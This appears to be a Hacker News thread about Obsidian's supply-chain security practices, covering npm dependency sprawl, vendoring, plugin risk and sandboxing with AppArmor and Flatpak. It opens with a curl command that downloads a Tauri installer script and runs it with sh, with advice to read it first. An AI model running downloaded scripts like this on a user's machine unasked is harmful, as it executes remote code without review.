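    curl -fsSL https://create.tauri.app/sh -o create-tauri.sh
    less create-tauri.sh    # actually read it before running it
    sh create-tauri.sh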
JavaScript is a lot more secure than C++, since it's a memory-managed language.
Buffer overflows are 0.001 percent of security incidents in practice.
Let's fix private key leakage and supply chain issues before worrying about C++ haxxors p0wning your machines.
If you have to render HTML, which is what markdown ultimately becomes, you might as well use a web browser.
These practices are very similar to what I've done in the past, for a large, sensitive system, and they worked very well.
(IIUC, we actually were the first to get a certain certification for cloud deployment, maybe because we had a good handle on this and other factors.)
From the language-specific network package manager, I pulled the small number of third-party packages we used into the filesystem tree of the system's repo, and audited each new version. And I disabled the network package manager in the development and deployment environments, to make it much harder for people to add dependencies accidentally.
Dependencies outside this were either from the Linux distro (nice, because of well-managed security updates), or went in the `vendor` or `ots` (off-the-shelf) trees of the repo (and were monitored for security updates).
Though, I look at some of the Python, JS, or Rust dependency explosions I sometimes see -- all dependent on being hooked up to the language's network package manager, with many people adding these cavalierly -- and it becomes a much harder problem.
If the obsidian team did a 2 hour q&a livestream every week, I'd watch every one (or at least get the AI summary). One of my favorite pieces of software ever.
I recently had a similar experience using Libby for the first time.
An absolutely incredible piece of software. If anyone here on HN works on it, you deserve to be proud of your work.
Going to preface this post by saying I use and love Obsidian, my entire life is effectively in an Obsidian vault, I pay for sync and as a user I'm extremely happy with it.
But as a developer, this post is nonsense and extremely predictable [1]. We can expect countless others like it, each explaining how their use of these broken tools is different and you just shouldn't worry about it!
By their own linked Credits page there are 20 dependencies. Let's take one of those, electron, which itself has 3 dependencies according to npm. Picking one of those, @electron/get has 7 dependencies. One of those, got, has 11 dependencies; one of those, cacheable-request, has 7 dependencies, and so on.
Now go back, pick another direct dependency of Obsidian, and work your way down the dependency tree again. Does the Obsidian team review all of these, and do they know who owns them? Do they trust each layer of the chain to pick up issues before they reach them? Any one of these dependencies can be compromised. That is what a supply chain attack is: you only have to quietly slip something into any one of these dependencies to gain access to countless users' critical data.
[1] https://drewdevault.com/2025/09/17/2025-09-17-An-impossible-...
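If anyone wants to repeat the exercise, npm will do the walking for you (run the last one inside a project that actually has the package in its tree):
    npm view electron dependencies        # direct dependencies of a published package
    npm view @electron/get dependencies
    npm explain cacheable-request         # why is this transitive dependency in my tree?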
To be fair, the electron project likely invests some resources in reviewing its own dependencies, because of its scale. But yeah, this is a good exercise; I think we need more systems like Yocto which prioritize complete understanding of the entire product from source.
Coincidentally I did that yesterday. Mermaid pulls in 137 dependencies. I love Obsidian and the Obsidian folks seem like good people but I did end up sandboxing it.
Love it. Jonathan Blow had a nice thread about dependencies a while back: https://x.com/Jonathan_Blow/status/1924509394416632250
This is obviously the way to do it, assuming you have the skills and resources to operate in this manner. If you don't, then godspeed, but you have to know going in that you are trading expediency now for risk later. Risk of performance issues, security vulnerabilities, changes in behavior, etc. And when the mess inevitably comes, at whatever inopportune time, you don't really get to blame other people...
I also recommend using this site to evaluate the dependencies of your dependencies:
https://npmgraph.js.org/?q=express
I installed an AppArmor profile for Obsidian. For an application that displays text files, it needed a lot of permissions. It would refuse to run without network access.
You can install Obsidian flatpak and lock it down with flatseal.
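If you prefer the command line over Flatseal, the same lock-down looks roughly like this (app ID from memory - check `flatpak list`; the vault path is just an example):
    flatpak override --user --nofilesystem=home md.obsidian.Obsidian
    flatpak override --user --filesystem=~/Notes md.obsidian.Obsidian    # grant access to just the vault
    flatpak override --user --unshare=network md.obsidian.Obsidian       # if you don't need sync or community plugins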
"The other packages help us build the app and never ship to users, e.g. esbuild or eslint."
Still, they can present a security risk by injecting malware at build time.
No mention of plugins, which are a core differentiator of Obsidian, so part of the overall "supply chain" for the app.
I've been using Roam Research since about 2020. Is Obsidian better?
Haven’t used Roam, but what I like about Obsidian:
- All your data is just plain files on your file system. Automation and interop are great, including with tools like Claude Code.
- It’s local-first, so performance is good.
- It’s extensible. Write extensions in HTML, CSS, and JS.
- It’s free.
- Syncing files is straightforward. Use git, Syncthing, Google Drive, or pay for their cheap sync service which is quite good.
- Product development is thoughtful and well done.
- They’re explicitly not trying to lock you in or own your data. They define open specs and build on them when Markdown doesn’t cut it.
Things you might not like:
- Their collaboration story isn’t great yet. No collaborative editing.
- It’s an Electron app.
Was hoping they outlined their approach to handling potentially compromised packages running on dev machines prior to even shipping. That seems like a much harder problem to solve.
> We don’t rush upgrades.
Can’t wait for “implements mechanism to delay application of new patches” to start showing up in compliance checklists. My procrastination will finally pay off!
What about the third party extensions?
I love Obsidian and wish I could make it my default markdown handler on Windows.
While we're on the topic: what's your default markdown handler on Windows?
Not my favorite but I was surprised recently when Windows 11 Notepad popped up something mentioning markdown support.
I love Obsidian dearly, but if you build an app that's only really useful with plugins, and that has a horrifyingly bad security model for plugins and little to no assurance of integrity of the plugins...
Maybe, just maybe, don't give fullmouthed advice on reducing risk in the supply chain.
But what about VScode?
"It may sound obvious but the primary way we reduce the risk of supply chain attacks is to avoid depending on third-party code."
What a horribly disingenuous statement, for a product that isn't remotely usable without 3rd-party plugins. The "Obsidian" product would be more aptly named "Mass Data Exfiltration Facilitator Pro".
I've used Obsidian for years without a single 3rd party plugin.
It is possible to make your same point without histrionic excess.
Yeah, this is always the response. Usability can be assessed objectively, so you just have low standards.
I have to agree that I don't find plugins necessary, and I'm not sure why you're so down on people using a solid backlinking note taker. I don't think I have low standards, I think Roam and Logseq aren't that great and Obsidian is all I need.
Has there been a supply chain attack with an LLM conduit yet? Because that would be spicy and is assuredly possible and plausible too.
Absolutely love Obsidian but had to stop using it because Electron apps don't play well with Wayland. After lots of tinkering around with flags and settings for compatibility layers, it became obvious that it would never work seamlessly like it did on Windows (and probably does on x11). So it was either give up Wayland compositors or give up Obsidian. Luckily I don't use any plugins, so moving to other software was easy, but I still would prefer Obsidian. Electron's "works everywhere" works about as good as Java's "works everywhere", which is to say it works great, until it doesn't, at which point it's a mess of tinkering.
If you use Wayland and it works for you, that's great, but it's not my experience.
In my experience electron + Wayland was absolutely god awful for a long time, but it got dramatically better in the last 4-5ish months. So depending on when you last tried it, might be worth a revisit. Heavily depends on which GPU+DE though, Nvidia+Plasma here.
I wish they could add Google Drive support to their mobile app. I'd be happy to pay $100+ for one-time-only Google Drive support.
missed opportunity for "less is secure"
"Secure" is a different, harder promise than safeR.
but still along the same lines as "safer". The stresses are different: "safer" has the stress as "SAY-fer" and "secure" has the stress as "sih-KYOOR". The latter sounds more similar to (and rhymes better with) "more", the originator of the phrase "less is more".
Well uh sure if meter's all you're going for here
> The other packages help us build the app and never ship to users, e.g. esbuild or eslint.
Eslint with such wonderful dependencies like is-glob smh
This doesn't make any sense to me. I've always been told you don't write anything yourself unless you absolutely have to and having a million micro-dependencies is a good thing. JavaScript and now Rust devs have been saying this for years. Surely they know what they're doing...
There is a balance to be struck. NPM in particular has been a veritable dependency hell for a long time. I don't know if it just attracts inexperienced developers, or if its security model is fundamentally flawed, but there have been soooo many supply chain attacks using NPM that being extra careful is very much warranted.